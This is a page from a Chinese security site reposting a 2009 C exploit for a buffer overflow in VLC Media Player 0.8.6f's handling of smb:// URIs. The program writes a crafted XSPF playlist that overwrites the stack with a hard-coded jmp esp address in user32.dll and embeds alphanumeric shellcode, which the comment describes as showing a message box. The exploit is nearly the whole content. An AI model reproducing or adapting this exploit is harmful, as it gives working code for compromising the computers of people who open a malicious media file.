首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit 来源：http://www.pank4j.com 作者：Pankaj 发布时间：2009-07-31   /*  VLC Media Player 'smb://' URI Handling Remote Buffer Overflow Vulnerability Exploit  *  Reference: http://www.securityfocus.com/bid/35500  *  *  Tested on VLC media player 0.8.6f on WinXP SP3  *    *  Coded by Pankaj Kohli  *  http://www.pank4j.com  *  */   #include <stdio.h> #include <string.h>   // ASCII shellcode (Display a message box & exit) unsigned char shell[] = "TY777777777777777777777777777777777QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIXkweaHrJwpf02pQzePMhyzWwSuQnioXPOHuBxKnaQlkOjpJHIvKOYokObPPwRN1uqt5PA";   long jmp = 0x7E485233;  // jmp esp (user32.dll)   int main(int argc, char **argv) {     char buff[512], *p;     FILE *fp;     int i;     long *ptr;       fp = fopen("sploit.xspf", "wb");     fprintf(fp, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n");     fprintf(fp, "<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n");     fprintf(fp, "\t<title>Playlist</title>\n");     fprintf(fp, "\t<trackList>\n");     fprintf(fp, "\t\t<track>\n");     fprintf(fp, "\t\t\t<location>smb://example.com@www.example.com/foo/#{");         printf("[*] Creating buffer\n");     for(i=0; i<300; i++) {         buff[i] = 'a' + ((i/4)%26);     }     ptr = (long *) (buff + 96);     *ptr = jmp;     for(i=0; i<strlen((const char *) shell); i++) {         buff[i+100] = shell[i];     }     buff[300] = 0;     fprintf(fp, "%s", buff);         fprintf(fp, "}</location>\n");     fprintf(fp, "\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");     fprintf(fp, "\t\t\t\t<vlc:id>0</vlc:id>\n");     fprintf(fp, "\t\t\t</extension>\n");     fprintf(fp, "\t\t</track>\n");     fprintf(fp, "\t</trackList>\n");     fprintf(fp, "</playlist>\n");     fclose(fp);          printf("[*] Exploit file written to sploit.xspf\n");          return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Compface 1.1.5 (.xbm File) Loc ·EPSON Status Monitor 3 Local P ·ISC BIND 9 Remote Dynamic Upda ·IBM AIX 5.3 libc MALLOCDEBUG F ·PunBB Reputation.php Mod <= 2. ·PunBB Reputation.php module ve ·bind can be crashed with an up ·Microsoft Windows XP (win32k.s ·Microsoft Windows XP (win32k.s ·WINMOD 1.4 (.lst) Local Stack ·Millenium MP3 Studio 1.0 .mpf ·Google SketchUp Pro 7.0 (.skp   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved